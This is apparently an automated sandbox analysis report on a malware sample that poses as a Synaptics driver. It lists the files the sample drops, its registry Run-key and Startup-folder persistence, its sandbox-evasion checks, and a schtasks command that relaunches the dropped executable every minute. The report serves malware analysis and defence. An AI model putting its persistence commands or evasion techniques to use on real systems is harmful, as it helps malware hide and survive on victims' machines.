                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_005020B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_005020B0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_004305A8 push ss; ret 2_2_004305A9
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C7795 push ecx; ret 2_2_003C77A8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0078BD45 pushad ; ret 3_2_0078BD47
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_00783E25 push eax; retf 3_2_00783E2D
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_00783A1D push edx; retf 3_2_00792FB9
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0544CFA4 push D40544D5h; iretd 3_2_0544CFA9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_007005A8 push ss; ret 9_2_007005A9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00697795 push ecx; ret 9_2_006977A8
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\AIXACVYBSB\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeFile created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeJump to dropped file
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\Users\user\Desktop\._cache_LWQDFZ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\ProgramData\Synaptics\RCXFBD9.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\AIXACVYBSB\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\ProgramData\Synaptics\RCXFBD9.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\AIXACVYBSB\~$cache1Jump to dropped file

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnkJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnkJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MHDFGYJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MHDFGYJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_003BF78E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_00407F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00407F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_0068F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006D7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_006D7F0E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_003C1E5A
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Found API chain indicative of sandbox detection
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeWindow / User API: threadDelayed 4236Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeWindow / User API: foregroundWindowGot 1363Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeAPI coverage: 6.7 %
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeAPI coverage: 4.0 %
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe TID: 7440Thread sleep time: -42360s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8044Thread sleep time: -6420000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeThread sleep count: Count: 4236 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000002.00000002.3037281317.00000000042E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000002.3020785623.0000000003488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000002.3022295381.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ._cache_LWQDFZ.exe PID: 7436, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7632, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BDD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_003BDD92
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003F2044
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003F219F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003F24A9
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_003E6B3F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_003E6E4A
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003EF350
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EFD47 FindFirstFileW,FindClose,2_2_003EFD47
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_003EFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_006C2044
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_006C219F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_006C24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_006B6B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_006B6E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_006BF350
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BFD47 FindFirstFileW,FindClose,9_2_006BFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_006BFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0068DD92
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_003BE47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\userJump to behavior
                              Source: Amcache.hve.23.drBinary or memory string: VMware
                              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.23.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.23.drBinary or memory string: VMware, Inc.
                              Source: KQNALS.exe, 0000000D.00000003.1545066238.000000000142F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 17108353S17108387S17108402S17108362S17108391S17108405S17108402S17108355S17108404S17108404S17108393S17108404VMWar&Prod_VMware_SA
                              Source: Amcache.hve.23.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.23.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.23.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.23.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
